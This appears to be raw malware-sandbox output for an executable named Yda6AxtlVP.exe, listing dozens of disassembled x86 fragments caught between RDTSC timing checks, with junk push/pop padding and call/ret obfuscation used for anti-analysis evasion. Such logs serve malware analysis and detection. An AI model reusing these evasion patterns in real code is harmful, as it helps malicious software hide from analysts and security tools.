Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164ACE0 second address: 164AD45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F9665989DB5h 0x0000000c jne 00007F9665989DA6h 0x00000012 popad 0x00000013 popad 0x00000014 nop 0x00000015 mov edi, dword ptr [ebp+12A03673h] 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebx 0x00000020 call 00007F9665989DA8h 0x00000025 pop ebx 0x00000026 mov dword ptr [esp+04h], ebx 0x0000002a add dword ptr [esp+04h], 00000018h 0x00000032 inc ebx 0x00000033 push ebx 0x00000034 ret 0x00000035 pop ebx 0x00000036 ret 0x00000037 mov dword ptr [ebp+12A0B279h], edx 0x0000003d push 00000000h 0x0000003f mov di, cx 0x00000042 xchg eax, esi 0x00000043 pushad 0x00000044 push ecx 0x00000045 js 00007F9665989DA6h 0x0000004b pop ecx 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164AD45 second address: 164AD4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164AFC3 second address: 164AFC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164CE07 second address: 164CE0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164CE0B second address: 164CE0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164CE0F second address: 164CE15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164CE15 second address: 164CE1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F9665989DA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164CE1F second address: 164CE23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1650D69 second address: 1650D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop esi 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9665989DB0h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164C037 second address: 164C03D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164EFEB second address: 164EFF1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164EFF1 second address: 164F006 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96652499FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164F006 second address: 164F014 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9665989DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164FF2F second address: 164FF44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jns 00007F96652499F8h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164F014 second address: 164F018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 164F0EC second address: 164F0F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1651E35 second address: 1651EB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F9665989DA8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 adc di, E845h 0x0000002b push 00000000h 0x0000002d movzx edi, bx 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edi 0x00000035 call 00007F9665989DA8h 0x0000003a pop edi 0x0000003b mov dword ptr [esp+04h], edi 0x0000003f add dword ptr [esp+04h], 0000001Ah 0x00000047 inc edi 0x00000048 push edi 0x00000049 ret 0x0000004a pop edi 0x0000004b ret 0x0000004c jno 00007F9665989DACh 0x00000052 mov edi, dword ptr [ebp+12A0387Bh] 0x00000058 push eax 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push edx 0x0000005d pop edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1650FE4 second address: 1650FE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1650FE9 second address: 1651003 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9665989DACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F9665989DA6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1652001 second address: 1652022 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9665249A06h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1652022 second address: 1652028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1652028 second address: 16520B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 xor di, F300h 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007F96652499F8h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f adc ebx, 3410DD42h 0x00000035 mov dword ptr [ebp+12B92569h], edx 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 jl 00007F9665249A12h 0x00000048 call 00007F9665249A05h 0x0000004d mov ebx, dword ptr [ebp+12A026EEh] 0x00000053 pop ebx 0x00000054 mov eax, dword ptr [ebp+12A01311h] 0x0000005a mov edi, ecx 0x0000005c push FFFFFFFFh 0x0000005e jmp 00007F96652499FFh 0x00000063 nop 0x00000064 push eax 0x00000065 push edx 0x00000066 jne 00007F96652499FCh 0x0000006c rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 165308A second address: 16530A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16530A9 second address: 16530AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 165835F second address: 1658383 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 js 00007F9665989DB8h 0x0000000c jmp 00007F9665989DB0h 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ecx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 165EC5A second address: 165EC84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F9665249A08h 0x0000000b jp 00007F96652499F6h 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1663F3C second address: 1663F41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1663F41 second address: 1663F48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1663F48 second address: 1663F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1663F55 second address: 1663F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1663F5A second address: 1663F82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e jnl 00007F9665989DA8h 0x00000014 pushad 0x00000015 ja 00007F9665989DA6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1663F82 second address: 1663F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1663F8F second address: 1663F93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1663F93 second address: 1663F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 166407A second address: 166407E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 166407E second address: 1664099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F96652499FAh 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1664099 second address: 1475A37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F9665989DB2h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jg 00007F9665989DB5h 0x0000001a pop eax 0x0000001b cmc 0x0000001c push dword ptr [ebp+12A003D1h] 0x00000022 jnp 00007F9665989DA7h 0x00000028 clc 0x00000029 call dword ptr [ebp+12A0291Eh] 0x0000002f pushad 0x00000030 pushad 0x00000031 jbe 00007F9665989DACh 0x00000037 or dword ptr [ebp+12A02622h], ecx 0x0000003d popad 0x0000003e xor eax, eax 0x00000040 jmp 00007F9665989DADh 0x00000045 mov edx, dword ptr [esp+28h] 0x00000049 mov dword ptr [ebp+12A024E8h], edx 0x0000004f mov dword ptr [ebp+12A038E7h], eax 0x00000055 pushad 0x00000056 mov dl, cl 0x00000058 mov esi, dword ptr [ebp+12A03873h] 0x0000005e popad 0x0000005f mov esi, 0000003Ch 0x00000064 jo 00007F9665989DACh 0x0000006a xor dword ptr [ebp+12A02622h], eax 0x00000070 add esi, dword ptr [esp+24h] 0x00000074 jmp 00007F9665989DB9h 0x00000079 lodsw 0x0000007b cmc 0x0000007c add eax, dword ptr [esp+24h] 0x00000080 je 00007F9665989DACh 0x00000086 mov dword ptr [ebp+12A024E8h], edx 0x0000008c mov ebx, dword ptr [esp+24h] 0x00000090 pushad 0x00000091 sub esi, dword ptr [ebp+12A038D3h] 0x00000097 sub ecx, 68227A00h 0x0000009d popad 0x0000009e push eax 0x0000009f jp 00007F9665989DB4h 0x000000a5 pushad 0x000000a6 jns 00007F9665989DA6h 0x000000ac push eax 0x000000ad push edx 0x000000ae rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1669167 second address: 1669175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F96652499F6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1669175 second address: 1669181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9665989DA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1669181 second address: 16691A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F9665249A03h 0x0000000b jp 00007F96652499F6h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16691A6 second address: 16691DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F9665989DACh 0x0000000c je 00007F9665989DBDh 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F9665989DB5h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16691DA second address: 16691DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1667E09 second address: 1667E21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1668422 second address: 1668428 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 166872A second address: 166873E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9665989DA6h 0x0000000a popad 0x0000000b pushad 0x0000000c js 00007F9665989DBAh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 166873E second address: 166875A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F96652499FEh 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1668CC0 second address: 1668CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1668CC4 second address: 1668CC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1668E60 second address: 1668E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F9665989DB2h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1668E80 second address: 1668E84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1668E84 second address: 1668E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1668E8C second address: 1668E9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96652499FAh 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1669015 second address: 1669019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 166C59A second address: 166C59F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 166C59F second address: 166C5A4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 166C5A4 second address: 166C5AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 166C5AF second address: 166C5CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 166C5CE second address: 166C5D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 15EED2D second address: 15EED31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 15EED31 second address: 15EED39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 15EED39 second address: 15EED47 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9665989DA8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 166F32C second address: 166F332 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 166F332 second address: 166F339 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16728F0 second address: 1672911 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jo 00007F96652499F6h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b jmp 00007F9665249A04h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1672911 second address: 1672939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F9665989DA6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F9665989DB3h 0x00000015 push eax 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1672939 second address: 1672942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1672942 second address: 1672946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1632EB6 second address: 16199D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ecx, dword ptr [ebp+12A03607h] 0x0000000f lea eax, dword ptr [ebp+12BC0C1Bh] 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F96652499F8h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f call 00007F9665249A09h 0x00000034 or dword ptr [ebp+12A0238Ch], edi 0x0000003a pop ecx 0x0000003b nop 0x0000003c jmp 00007F96652499FEh 0x00000041 push eax 0x00000042 jnl 00007F96652499FEh 0x00000048 nop 0x00000049 push 00000000h 0x0000004b push edx 0x0000004c call 00007F96652499F8h 0x00000051 pop edx 0x00000052 mov dword ptr [esp+04h], edx 0x00000056 add dword ptr [esp+04h], 00000015h 0x0000005e inc edx 0x0000005f push edx 0x00000060 ret 0x00000061 pop edx 0x00000062 ret 0x00000063 sub dword ptr [ebp+12A023F2h], ebx 0x00000069 call dword ptr [ebp+12B8F804h] 0x0000006f push eax 0x00000070 push edx 0x00000071 jl 00007F96652499FCh 0x00000077 jo 00007F96652499F6h 0x0000007d rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16330EE second address: 16330F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 163339F second address: 16333AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F96652499F6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 163355F second address: 1633566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1633566 second address: 163359C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9665249A06h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 163359C second address: 1633649 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F9665989DB6h 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 jmp 00007F9665989DAEh 0x0000001a jne 00007F9665989DACh 0x00000020 popad 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push ecx 0x00000026 pushad 0x00000027 push edx 0x00000028 pop edx 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c pop ecx 0x0000002d pop eax 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007F9665989DA8h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 mov dword ptr [ebp+12B92569h], eax 0x0000004e call 00007F9665989DA9h 0x00000053 jnp 00007F9665989DAEh 0x00000059 jns 00007F9665989DA8h 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 ja 00007F9665989DB1h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16CD736 second address: 16CD73A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
